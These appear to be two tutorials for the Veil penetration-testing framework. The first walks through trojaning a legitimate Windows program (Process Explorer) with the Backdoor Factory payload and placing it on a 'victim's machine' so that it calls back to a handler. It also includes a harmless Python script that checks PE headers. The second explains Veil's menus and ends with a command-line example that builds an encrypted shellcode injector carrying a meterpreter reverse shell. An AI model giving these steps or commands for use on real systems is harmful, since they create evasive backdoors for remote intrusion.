How to Customize Backdoor Factory Payloads within Veil

We were lucky enough to be able to include The Backdoor Factory by Joshua Pitts in our October 2013 V-day.  It’s a great tool and we’re really happy to have been able to work with Josh to include the Backdoor Factory within Veil as an option.  As it is currently implemented, the Backdoor Factory payload will backdoor the psinfo.exe executable that ships with Veil.  So this leads to the question: how do you change the executable that is backdoored?  That’s what this tutorial sets out to show you.

First, you’ll need to select the executable you want to backdoor.  In this instance, we chose the Microsoft tool Process Explorer.  One thing to note when choosing the executable to backdoor: ensure that it’s not UPX packed.  Also, in our current implementation of the Backdoor Factory payloads, we’re primarily focused on 32-bit (x86) binaries.  Full support for x64 binaries within Veil will come in a future update.
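The two constraints above (not UPX packed, 32-bit) can both be read straight out of the PE headers before you spend time on a binary that the tooling will reject anyway. The following is an added example, not code from the original post nor from Veil or the Backdoor Factory: a dependency-free Python inspector that walks the DOS header, NT file header and section table, reports the target machine, and flags the section names UPX leaves behind. The sample images it builds are constructed header-only stubs for exercising the parser, not real programs.

```python
import struct
import sys

# IMAGE_FILE_HEADER.Machine values and optional-header magics from the PE specification
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC = 0x10B        # 32-bit optional header
PE32PLUS_MAGIC = 0x20B    # 64-bit optional header
# Section names written by a default UPX build (heuristic: packers can rename sections)
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}


def inspect_pe(data):
    """Parse the headers of an in-memory PE image and summarise what matters here."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")

    # IMAGE_FILE_HEADER immediately follows the 4-byte signature (20 bytes)
    fh = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)

    # Optional header starts with its Magic field; section table follows it
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0] if opt_size >= 2 else None
    sect = opt + opt_size
    names = []
    for i in range(nsections):
        raw = data[sect + i * 40: sect + i * 40 + 8]   # IMAGE_SECTION_HEADER.Name
        names.append(raw.rstrip(b"\0"))

    return {
        "machine": machine,
        "magic": magic,
        "is_32bit": machine == IMAGE_FILE_MACHINE_I386 and magic != PE32PLUS_MAGIC,
        "sections": names,
        "upx_packed": any(n in UPX_SECTION_NAMES for n in names),
    }


def problems(data):
    """Return the list of reasons a binary does not meet the constraints in the text."""
    info = inspect_pe(data)
    out = []
    if not info["is_32bit"]:
        out.append("not a 32-bit (x86) image: Machine=0x%04X" % info["machine"])
    if info["upx_packed"]:
        out.append("looks UPX packed (sections %s)" % b",".join(info["sections"]).decode())
    return out


def build_sample_pe(machine, section_names, magic=PE32_MAGIC):
    """Constructed header-only PE stub for testing the parser; it is not an executable."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    opt = struct.pack("<H", magic) + b"\0" * 94                    # 96-byte stub optional header
    file_hdr = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, len(opt), 0x0102)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + file_hdr + opt + sections


if __name__ == "__main__":
    # Usage: python pe_check.py <file.exe>; with no argument, run on constructed samples
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh_:
            print(problems(fh_.read()) or ["ok"])
    else:
        for label, blob in [
            ("x86 plain", build_sample_pe(IMAGE_FILE_MACHINE_I386, [b".text", b".data"])),
            ("x86 upx", build_sample_pe(IMAGE_FILE_MACHINE_I386, [b"UPX0", b"UPX1", b".rsrc"])),
            ("x64 plain", build_sample_pe(IMAGE_FILE_MACHINE_AMD64, [b".text"], PE32PLUS_MAGIC)),
        ]:
            print(label, "->", problems(blob) or ["ok"])
```

The section-name test is only a heuristic: UPX and other packers can be told to rename their sections, so an empty `problems()` list means "nothing obvious", not "unpacked". If `upx` is installed, `upx -t file.exe` is the authoritative test for a UPX-compressed file.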

Now that we have our executable, copy it into the “tools/backdoor” directory within the Veil folder structure as shown below.  Alternatively, you can provide the full path to your executable in the orig_exe option (as shown in this video).

[Screenshot: bdffolder]

Now that our binary is in the correct location, we can start Veil.  When listing the available payloads, use the “native/BackdoorFactory” payload.  Next, we need to set the required options.  Go ahead and define the LHOST and LPORT options to correspond with your handler.  Then change the “orig_exe” option: in this case, set it to the new executable, “procexp.exe” (if you didn’t place your executable in the tools/backdoor directory, provide the full path to the executable you want to backdoor).

[Screenshot: setorig_exe]

We can always verify that our options are correctly set by typing the “info” command.

[Screenshot: generatebdf]

Now that we’ve confirmed we’re all set, go ahead and give Veil the “generate” command.  Veil will invoke the Backdoor Factory payload and use the Process Explorer executable.  Once the backdoored executable has been generated, you should see Veil’s familiar output screen.

[Screenshot: procbackdoored]

Now, simply move the backdoored executable onto your victim’s machine and run it.  You will still see the executable run normally, except we now also receive a callback!

[Screenshot: backdooredproccallback]

And that is how you change the program that is backdoored within Veil.  If you have any questions, just let us know!


Veil Tutorial – Usage

With the completely revamped menu structure released in Veil 2.0, we felt it was appropriate to write a short tutorial detailing how to use Veil. At any point, if anyone has any usage questions, please feel free to talk to any of us via Twitter at:

If you encounter any bugs, have any patches, or wish to add new features, send us a request via GitHub. GitHub lets us easily track the status of any issues and makes sure we can provide credit where necessary. You can also ask any questions on our forums or hit us up on #veil on freenode.

To launch Veil, run “./Veil.py”. On its initial run, Veil executes ./config/update.py, which attempts to detect installation directories, operating system details, and other relevant specifications, and writes them out to /etc/veil/settings.py. This settings configuration file can also be edited by hand.

After configuration, you will be presented with the main menu. This details the number of payload modules loaded as well as useful commands:

[Screenshot: veil_main_menu]

Type “list” to list all payloads:

[Screenshot: veil_list_payloads]

To list information on a specific payload, type “info [payload number/payload name]”, or “info [tab]” to tab complete the payloads available. To use a payload, type “use [payload number/payload name]”, or “use [tab]” to tab complete the payloads available. You can also just type the number of the payload from “list” in order to use the associated payload. On loading a specific module, the payload menu is presented:

[Screenshot: veil_payload_menu]

This presents details and required options for the payloads, as well as relevant commands. Typing “info” will give more detailed information about the payload:

[Screenshot: veil_payload_info]

Under “required options”, the name of the option as well as its default value and description are displayed. If a value isn’t filled in for the default, you will be required to input a value before the payload can be generated. To set an option value, type “set [option name]” then type the desired value.

After filling in the required options, to actually generate the payload, type “generate”. If the payload uses shellcode, you will be taken to the shellcode menu, where you can select 1) msfvenom or 2) custom shellcode. If custom shellcode is selected, input your shellcode in the form \x01\x02… without quotes and newlines (\n). If msfvenom is chosen, you will be presented with the default choice of windows/meterpreter/reverse_tcp. If you want another payload, enter the windows payload in msfvenom syntax, or press [tab] to tab complete the available payloads. The MSF tree is automatically crawled, and payloads/options extracted. After choosing a payload, required options are presented (LHOST is tab completable for the local IP and LPORT is tab completable for 4444, the default MSF port). After filling in required options, the opportunity to enter extra msfvenom options in “OPTION=value” syntax is presented.

[Screenshot: veil_generation_menu]

After pressing enter, shellcode is generated and the payload is built. You are then presented with the output menu, where you can choose the base name for your generated payload files. If your payload was Python-based and you set “compile_to_exe” in the options, you will be presented with the choice of pyinstaller (compile to exe natively on Kali Linux) or the generation of py2exe files.

[Screenshot: veil_output_menu]

The final screen displays information on the generated payload, including any compiled/source file locations. Pressing any key will return you to the main menu.

[Screenshot: veil_output_menu]

Veil also now incorporates command line switches for almost all options. “./Veil.py -h” details all the available options. A quick example:

$ ./Veil.py -p python/shellcode_inject/aes_encrypt -o output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.1.1 LPORT=443